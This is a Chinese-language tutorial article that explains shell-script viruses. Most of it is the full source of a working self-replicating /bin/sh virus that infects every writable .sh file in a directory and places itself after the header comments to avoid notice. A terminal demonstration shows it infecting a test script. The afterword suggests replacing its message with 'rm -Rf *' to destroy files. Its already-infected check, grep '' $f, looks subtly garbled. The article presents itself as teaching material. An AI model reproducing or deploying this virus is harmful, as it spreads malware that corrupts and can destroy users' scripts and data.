SHELL病毒簡介

1. 前言

說起病毒總有點神秘的味道，想起以前用匯編編寫第一個dos病毒時是那麼的痛苦從開始有設想到完成花了3個多月，而且寫的也是亂七八糟，最近突發奇想不就是感染其他檔案，傳播自己嗎，用shell寫一個病毒且不是非常簡單，於是順手寫了如下這麼一個小指令碼，功能就是感染其他shell程式。

這個程式在現實意義不大，但對於形象的理解病毒傳播機制還是很很有幫助，可以算教學意義大於實際意義吧。

2. 程式程式碼

#!/bin/sh
#檔名: virus_demo.sh
#用途 : shell病毒演示。
#說明 : 病毒將感染當前目錄下的所有.sh結尾的檔案，但不會重複感染。
#編寫 : watercloud@xfocus.org
#日期 : 2003-5-13

#B:
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^*#)|(^*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:/,/^#E:/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo

echo "Hi, here is a demo shell virus in your script !"
#E:
#EOF

看shell是多麼得強大，這麼短短得程式就能感染其他程式檔案。

3. 演示

測試一下：

先在當前目錄放兩個檔案，一個病毒檔案，一個用來作被感染測試用。

[cloud@ /export/home/cloud/vir]> ls -l
drwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./
drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../
-rwxr--r-- 1 cloud staff 89 6?? 4 17:43 test.sh
-rwxr--r-- 1 cloud staff 773 6?? 4 17:42 virus_demo.sh

來看看我們這個"肉雞"指令碼,很簡單：

[cloud@ /export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# Author : foo
# Date : 3000-1-1

ls -l

#EOF

好了開始感染他。

[cloud@ /export/home/cloud/vir]> ./virus_demo.sh
Hi, here is a demo shell virus in your script !

來看看感染後的結果：

[cloud@ /export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# Author : foo
# Date : 3000-1-1

#B:
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^*#)|(^*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:/,/^#E:/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo

echo "Hi, here is a demo shell virus in your script !"
#E:

ls -l

#EOF

看，病毒體:

#B:
. . . .
#E:

被複製過來了，這樣病毒就被傳播了。值得注意的是病毒體插入的位置是在源test.sh的有效程式行的開始處！這主要考慮到一般shell程式大家都喜歡在程式開始處作註釋說明，你好歹不能把別人的註釋資訊給放到後面去，那也太明顯了吧。

來執行看看我們新的病毒體看看：

[cloud@ /export/home/cloud/vir]> ./test.sh
Hi, here is a demo shell virus in your script !

-rwxr-xr-x 1 cloud staff 724 6?? 4 17:44 test.sh
-rwxr-xr-x 1 cloud staff 773 6?? 4 17:42 virus_demo.sh

4. 簡單講解

我們來一步步分析一下這個病毒： #B: 病毒體開始標記,用於程式複製自己定位用。 vFile=$_ ; vTmp=/tmp/.vTmp.$$ 定義兩個變數，一個臨時檔案，一個記錄當前程式名稱$_，這也就要求我們必須把這行作為程式有效行的第一行，如果放後頭我們就無法得到當前程式名稱，後面就找不到從哪裡去找病毒體來複製了。

for f in ./*.sh; do

開始迴圈，找到當前目錄下的所有.sh結尾的程式。

if [ ! -w $f -a ! -r $vFile ]; then continue; fi

目標是否有寫許可權，病毒原始檔是否有讀許可權。

if grep '' $f ; then continue; fi

目標是否已經中毒很深無藥可救了，如果是這樣還給他再來一次也太不仁義了吧？

if sed -n '1p' $f | grep 'csh'; then continue; fi

如果目標shell是以csh的那語法上差異太大了，放棄吧。

cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi

好了準備感染，先把目標複製一個備份，複製失敗了怎麼辦？當然只好放棄了。

vNo=`awk '$0~/(^*#)|(^*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`

這是幹嘛？好像挺複雜，不過學shell病毒不瞭解awk和正規表示式好像有點說不過去吧，這個就是找到程式開始的註釋和空白行有多少，好方便我們確定病毒體插入點。

sed -n "1,${vNo}p" $vTmp >$f

一個sed命令把目標檔案的開始註釋部分從備份檔案中copy回來。

(sed -n '/^#B:/,/^#E:/p' $vFile ;echo ) >>$f

再來一個sed完成搬運病毒體的工作。

vNo=`expr $vNo + 1`
sed -n "${vNo},$p" $vTmp >>$f

最後一個sed把目標檔案的其他部分搬回來，sed真強大呀！！

rm -f $vTmp

清理一下臨時檔案。

done >/dev/null 2>&1

迴圈結束。

unset vTmp ;unset vFile ;unset vNo

清理一下犯罪現場。

echo "Hi, here is a demo shell virus in your script !"

都感染了好歹也要顯示點東西以告訴別人這是個被病毒感染過的程式吧。

#E:

病毒體結束標記,用於程式複製自己定位用。

5. 後記

從中我們可以看到指令碼病毒非常簡單，不需要很多知識就能寫一個，而且病毒破壞力也是不可小視比如我們的程式裡把echo資訊改為rm -Rf * ；同時反方面也展示了shell的強大之處，試想傳統的程式光是處理PE檔案結構和ELF結構就得花多少功夫。

上面得程式已經在Linux和Solaris上測試透過，windows上得使用者在Cygwin上應該也行。

順便再強調一次，寫這篇文章得目的是和大家分享一下對病毒得理解，而不是教寫病毒出去害人，切記切記！

[@more@]

Linux作業系統下Shell病毒詳細介紹

相關文章